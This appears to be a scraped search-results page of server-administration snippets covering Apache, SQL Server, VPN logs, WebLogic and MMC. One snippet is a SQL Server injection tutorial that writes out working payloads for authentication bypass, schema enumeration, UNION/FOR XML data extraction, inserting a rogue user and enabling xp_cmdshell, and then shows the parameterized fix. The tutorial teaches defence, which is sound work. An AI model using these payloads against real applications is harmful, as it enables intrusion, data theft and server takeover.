Search Results

Search found 94532 results on 3782 pages for 'server management'.

Page 423/3782 | < Previous Page | 419 420 421 422 423 424 425 426 427 428 429 430  | Next Page >

  • 2nd apache server fails to start

    - by ito3
    HI, I have determine that my 2nd server which fail to start because of this entry in conf. Once I remove this entry, the server start up as normal. Alias /Reports/ "//abc/filedir/a/" <Directory "//abc/filedir/a/"> Order allow,deny Allow from all </Directory> I have a primary apache server which is also pointing to the folder with the same setting. I will like to know why the 2nd server failed to start, is it because the server one has locked the folder. //abc is my NAS server running on window 2003. Thanks

    Read the article

  • How to ensure dbs are all in sync when restored?

    - by blade
    Hi, In large server environments, how do you handle the issue of backing up SQL Server dbs which may not be in sync with other dbs they rely on? So if I back up DB1 from a server, and it uses another db which is not backed up, doing a restore when the dbs are in differing state could cause problems? It seems like all dependent DBs should be backed up, regardless of size etc, but in my current job (where we're a datacentre company and I'm a .NET Developer), I only backup some of several dependent DBs on a SQL Server instance. Thanks

    Read the article

  • Problem with setup VPN in Ubuntu Server 12.04

    - by Yozone W.
    I have a problem with setup VPN server on my Ubuntu VPS, here is my server environments: Ubuntu Server 12.04 x86_64 xl2tpd 1.3.1+dfsg-1 pppd 2.4.5-5ubuntu1 openswan 1:2.6.38-1~precise1 After install software and configuration: ipsec verify Checking your system to see if IPsec got installed and started correctly: Version check and ipsec on-path [OK] Linux Openswan U2.6.38/K3.2.0-24-virtual (netkey) Checking for IPsec support in kernel [OK] SAref kernel support [N/A] NETKEY: Testing XFRM related proc values [OK] [OK] [OK] Checking that pluto is running [OK] Pluto listening for IKE on udp 500 [OK] Pluto listening for NAT-T on udp 4500 [OK] Checking for 'ip' command [OK] Checking /bin/sh is not /bin/dash [WARNING] Checking for 'iptables' command [OK] Opportunistic Encryption Support [DISABLED] /var/log/auth.log message: Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [RFC 3947] method set to=115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike] meth=114, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-08] meth=113, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-07] meth=112, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-06] meth=111, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-05] meth=110, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-04] meth=109, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-03] meth=108, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-02] meth=107, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-02_n] meth=106, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: ignoring Vendor ID payload [FRAGMENTATION 80000000] Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [Dead Peer Detection] Oct 16 06:50:54 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: responding to Main Mode from unknown peer [My IP Address] Oct 16 06:50:54 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: transition from state STATE_MAIN_R0 to state STATE_MAIN_R1 Oct 16 06:50:54 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: STATE_MAIN_R1: sent MR1, expecting MI2 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: NAT-Traversal: Result using draft-ietf-ipsec-nat-t-ike (MacOS X): peer is NATed Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: transition from state STATE_MAIN_R1 to state STATE_MAIN_R2 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: STATE_MAIN_R2: sent MR2, expecting MI3 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: ignoring informational payload, type IPSEC_INITIAL_CONTACT msgid=00000000 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: Main mode peer ID is ID_IPV4_ADDR: '192.168.12.52' Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: switched from "L2TP-PSK-NAT" to "L2TP-PSK-NAT" Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: deleting connection "L2TP-PSK-NAT" instance with peer [My IP Address] {isakmp=#0/ipsec=#0} Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: transition from state STATE_MAIN_R2 to state STATE_MAIN_R3 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: new NAT mapping for #5, was [My IP Address]:2251, now [My IP Address]:2847 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: STATE_MAIN_R3: sent MR3, ISAKMP SA established {auth=OAKLEY_PRESHARED_KEY cipher=aes_256 prf=oakley_sha group=modp1024} Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: Dead Peer Detection (RFC 3706): enabled Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: the peer proposed: [My Server IP Address]/32:17/1701 -> 192.168.12.52/32:17/0 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: NAT-Traversal: received 2 NAT-OA. using first, ignoring others Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: responding to Quick Mode proposal {msgid:8579b1fb} Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: us: [My Server IP Address]<[My Server IP Address]>:17/1701 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: them: [My IP Address][192.168.12.52]:17/65280===192.168.12.52/32 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: transition from state STATE_QUICK_R0 to state STATE_QUICK_R1 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: STATE_QUICK_R1: sent QR1, inbound IPsec SA installed, expecting QI2 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: Dead Peer Detection (RFC 3706): enabled Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: transition from state STATE_QUICK_R1 to state STATE_QUICK_R2 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: STATE_QUICK_R2: IPsec SA established transport mode {ESP=>0x08bda158 <0x4920a374 xfrm=AES_256-HMAC_SHA1 NATOA=192.168.12.52 NATD=[My IP Address]:2847 DPD=enabled} Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: received Delete SA(0x08bda158) payload: deleting IPSEC State #6 Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: ERROR: netlink XFRM_MSG_DELPOLICY response for flow eroute_connection delete included errno 2: No such file or directory Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: received and ignored informational message Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: received Delete SA payload: deleting ISAKMP State #5 Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address]: deleting connection "L2TP-PSK-NAT" instance with peer [My IP Address] {isakmp=#0/ipsec=#0} Oct 16 06:51:16 vpn pluto[3963]: packet from [My IP Address]:2847: received and ignored informational message xl2tpd -D message: xl2tpd[4289]: Enabling IPsec SAref processing for L2TP transport mode SAs xl2tpd[4289]: IPsec SAref does not work with L2TP kernel mode yet, enabling forceuserspace=yes xl2tpd[4289]: setsockopt recvref[30]: Protocol not available xl2tpd[4289]: This binary does not support kernel L2TP. xl2tpd[4289]: xl2tpd version xl2tpd-1.3.1 started on vpn.netools.me PID:4289 xl2tpd[4289]: Written by Mark Spencer, Copyright (C) 1998, Adtran, Inc. xl2tpd[4289]: Forked by Scott Balmos and David Stipp, (C) 2001 xl2tpd[4289]: Inherited by Jeff McAdams, (C) 2002 xl2tpd[4289]: Forked again by Xelerance (www.xelerance.com) (C) 2006 xl2tpd[4289]: Listening on IP address [My Server IP Address], port 1701 Then it just stopped here, and have no any response. I can't connect VPN on my mac client, the /var/log/system.log message: Oct 16 15:17:36 azone-iMac.local configd[17]: SCNC: start, triggered by SystemUIServer, type L2TP, status 0 Oct 16 15:17:36 azone-iMac.local pppd[3799]: pppd 2.4.2 (Apple version 596.13) started by azone, uid 501 Oct 16 15:17:38 azone-iMac.local pppd[3799]: L2TP connecting to server 'vpn.netools.me' ([My Server IP Address])... Oct 16 15:17:38 azone-iMac.local pppd[3799]: IPSec connection started Oct 16 15:17:38 azone-iMac.local racoon[359]: Connecting. Oct 16 15:17:38 azone-iMac.local racoon[359]: IPSec Phase1 started (Initiated by me). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Main-Mode message 1). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: receive success. (Initiator, Main-Mode message 2). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Main-Mode message 3). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: receive success. (Initiator, Main-Mode message 4). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Main-Mode message 5). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKEv1 Phase1 AUTH: success. (Initiator, Main-Mode Message 6). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: receive success. (Initiator, Main-Mode message 6). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKEv1 Phase1 Initiator: success. (Initiator, Main-Mode). Oct 16 15:17:38 azone-iMac.local racoon[359]: IPSec Phase1 established (Initiated by me). Oct 16 15:17:39 azone-iMac.local racoon[359]: IPSec Phase2 started (Initiated by me). Oct 16 15:17:39 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Quick-Mode message 1). Oct 16 15:17:39 azone-iMac.local racoon[359]: IKE Packet: receive success. (Initiator, Quick-Mode message 2). Oct 16 15:17:39 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Quick-Mode message 3). Oct 16 15:17:39 azone-iMac.local racoon[359]: IKEv1 Phase2 Initiator: success. (Initiator, Quick-Mode). Oct 16 15:17:39 azone-iMac.local racoon[359]: IPSec Phase2 established (Initiated by me). Oct 16 15:17:39 azone-iMac.local pppd[3799]: IPSec connection established Oct 16 15:17:59 azone-iMac.local pppd[3799]: L2TP cannot connect to the server Oct 16 15:17:59 azone-iMac.local racoon[359]: IPSec disconnecting from server [My Server IP Address] Oct 16 15:17:59 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Information message). Oct 16 15:17:59 azone-iMac.local racoon[359]: IKEv1 Information-Notice: transmit success. (Delete IPSEC-SA). Oct 16 15:17:59 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Information message). Oct 16 15:17:59 azone-iMac.local racoon[359]: IKEv1 Information-Notice: transmit success. (Delete ISAKMP-SA). Anyone help? Thanks a million!

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • July, the 31 Days of SQL Server DMO’s – Day 28 (sys.dm_db_stats_properties)

    - by Tamarick Hill
    The sys.dm_db_stats_properties Dynamic Management Function returns information about the statistics that are currently on your database objects. This function takes two parameters, an object_id and a stats_id. Let’s have a look at the result set from this function against the AdventureWorks2012.Sales.SalesOrderHeader table. To obtain the object_id and stats_id I will use a CROSS APPLY with the sys.stats system table. SELECT sp.* FROM sys.stats s CROSS APPLY sys.dm_db_stats_properties(s.object_id, s.Stats_id) sp WHERE sp.object_id = object_id('Sales.SalesOrderHeader') The first two columns returned by this function are the object_id and the stats_id columns. The next column, ‘last_updated’, gives you the date and the time that a particular statistic was last updated. The next column, ‘rows’, gives you the total number of rows in the table as of the last statistic update date. The ‘rows_sampled’ column gives you the number of rows that were sampled to create the statistic. The ‘steps’ column represents the number of specific value ranges from the statistic histogram. The ‘unfiltered_rows’ column represents the number of rows before any filters are applied. If a particular statistic is not filtered, the ‘unfiltered_rows’ column will always equal the ‘rows’ column. Lastly we have the ‘modification_counter’ column which represents the number of modification to the leading column in a given statistic since the last time the statistic was updated. Probably the most important column from this Dynamic Management Function is the ‘last_updated’ column. You want to always ensure that you have accurate and updated statistics on your database objects. Accurate statistics are vital for the query optimizer to generate efficient and reliable query execution plans. Without accurate and updated statistics, the performance of your SQL Server would likely suffer. For more information about this Dynamic Management Function, please see the below Books Online link: http://msdn.microsoft.com/en-us/library/jj553546.aspx Folllow me on Twitter @PrimeTimeDBA

    Read the article

  • Configuring Weblogic Server 10.3.6 from 32-bit mode to 64-bit mode

    - by Ekta Malik
    This post pertains to the configuration of Weblogic Server from 32-bit mode to 64-bit mode on Solaris OS. Just in case, you have WLS 10.3.6 running in 32-bit mode and the JDK being used is installed for 64-bit mode [On Solaris OS, JDK 64-bit installation comprises of installing 32-bit JDK followed by a patch for 64-bit JDK].  Verification of the mode being used One can verify the mode of Weblogic Server in the following ways Either check the commonEnv.sh script located at $MIDDLEWARE_HOME/wlserver_10.3/common/bin where $MIDDLEWARE_HOME refers to the install directory of Middleware. Look for the patterns - SUN_ARCH_DATA_MODEL and JAVA_USE_64BIT in the file. For 32-bit mode, the parameters would appear as shown belowSUN_ARCH_DATA_MODEL="32"JAVA_USE_64BIT=false Check the server console logs; which JDK is being used during start-up By checking which JDK is used by the running process of Weblogic Server Configuration Steps Take a backup of the commonEnv.sh script located at $MIDDLEWARE_HOME/wlserver_10.3/common/bin where $MIDDLEWARE_HOME refers to the install directory of Middleware Modify the commonEnv.sh script for the following parameters: The values should be 64 and true respectively for 64-bit modeSUN_ARCH_DATA_MODEL="64"JAVA_USE_64BIT=true  Restart the weblogic server. One can confirm that the JDK being used is 64-bit by looking at the Weblogic console logs during server start up or by looking at the running process.

    Read the article

  • Php profiling on production server or other options

    - by absentx
    Alright I need some help here. I am commonly asked to speed up certain sections of some websites that I program for. I have yet to be able to figure out how to use a good php diagnosis/profiling tool. Some things to consider: The sites I am working on are already built, getting a testing server set up locally is just a huge pain..I have to rewrite include paths and just so many things. This is a results oriented deal and spending days to get a site fully working on a testing platform so I can debug one page probably isn't an option. I can write tons of php, but I have no clue how to interact or mess with servers. So every tutorial I read about setting up xdebug or xhprof all seem to involve getting something installed on a production server that I don't have access to or have no clue how to work with. So are there any solutions out there that will show me where my php is slow without having to do all sorts of server stuff that I just don't know how to do? Xhprof seems to be the closest to useable for me but from what I can tell it still has to be installed on a server. If anyone can just point me in the right direction on this I would be very grateful. Maybe getting these things put on the server isn't a big deal...but I have never interacted with server command lines or anything like that. I suppose I should start sometime but I really have no idea where to start. Plus I realize that profiling on a live platform is not the greatest idea either but I feel I am in a tough spot. I have speed issues to solve and setting up a local environment while a great idea, just doesn't seem real practical at the moment.

    Read the article

  • Remote server's x menus without vino, vnc etc

    - by Fredde
    A question where both google searches, as well as askubuntu and ubuntu forums searches fails though rephrasing the question a number of times. Have a Lubuntu server with some storage and functions and a lubuntu laptop. Previous when running winXP, I had Xming, could start a x-session on the server, got the lxpanel on the laptop, switching, running x-programs without a hitch though the lxpanel menu. A very neat and convenient solution. However the winXP crashed, me moving to lubuntu also for the laptop. still things work, I ssh into the server and can start x-programs without a hitch. But, as with all graphical desktops, I at times need access to the lx menus on the server to find programs and here the problems arise, most finding I got talk about installing VNC, vino etc overkills, avoiding existing X-integration between the servers. I'll like to do as I did with Xming, see the menu system on the server, in my "client's" xwin? Just to see the servers installed software without colliding with the laptop X-server, just using it as normal X-apps.

    Read the article

  • How to start WebLogic Server using default scripts?

    - by Luz Mestre-Oracle
    There are a few common issues reported when starting weblogic server using scripts. 1. User is not able to access weblogic console. 2. After a few days/hours weblogic server stops abruptly. 3. When user closes putty, they are not able to connect to weblogic server anymore. 4. When user closes windows command prompt, they are not able to connect to weblogic server anymore. 5. Weblogic is started using startManagedWebLogic.cmd/startManagedWebLogic.sh. By default, WebLogic Server does not run in background mode, so after you close the window the process finishes as well. In Linux/Unix based platforms, you need to use: nohup ./startManagedWebLogic.sh <Server> <URL> & In Windows platforms, you need to start Managed Servers using Windows Services: How to Install MS Windows Services For FMW 11g WebLogic Domain Admin and Managed Servers (Doc ID 1060058.1) http://docs.oracle.com/cd/E23943_01/web.1111/e13708/winservice.htm There a few more reasons that could cause similar symptoms, like JVM crash, signals sent by the Operating System, and many other reasons.  But the above steps is the first one to start. Enjoy!

    Read the article

  • Android chess development design [on hold]

    - by Plejo
    I want to develop human vs human android chess game and I have bunch of new questions. I would like to have screen where online players are shown(nickname, rating) and when player challenge antoher player and he accpet it game begins. These are my questions: When player install application, does he have to create account/login or does every instance of installed application have some kind of ID so I can recognize it on server side? I want to have also ratings of players saved in my DB so login procedure will probably be necessary. When player connects to server server updates online players list. When he challenge another player and he accept server exchange ip`s(and ports? which port to use?) between players. Then they connect to each other and game begins. What is best practice for connection between server-android and android-android? Probably sockets, right? Is there any library for handling lost connection etc.? Which server do you recommend?

    Read the article

  • Microsoft Management Console stops working when I add snap-in to it

    - by JayaprakashReddy
    I have Windows 7 Ultimate OS. I'm opening mmc.exe as administrator and trying add Certificates or any other snap-in, then while loading that snap-in MMC breaks and displays following message and after that it closes automatically once I click on close button on that message. What could be the problem? I did following to fix the problem but couldn't succeed any of these: I tried to repair the OS I repaired files using this method Even repaired the installation using this link Update: *@oldskool: Here is the debug process output:* Sorry its a long output text. 'mmc.exe': Loaded 'C:\Windows\System32\mmc.exe', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ntdll.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\kernel32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\KernelBase.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\gdi32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\user32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\lpk.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\usp10.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\msvcrt.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mfc42u.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ole32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\rpcrt4.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\oleaut32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\odbc32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\advapi32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\sechost.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mmcbase.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\shlwapi.dll', Cannot find or open the PDB file 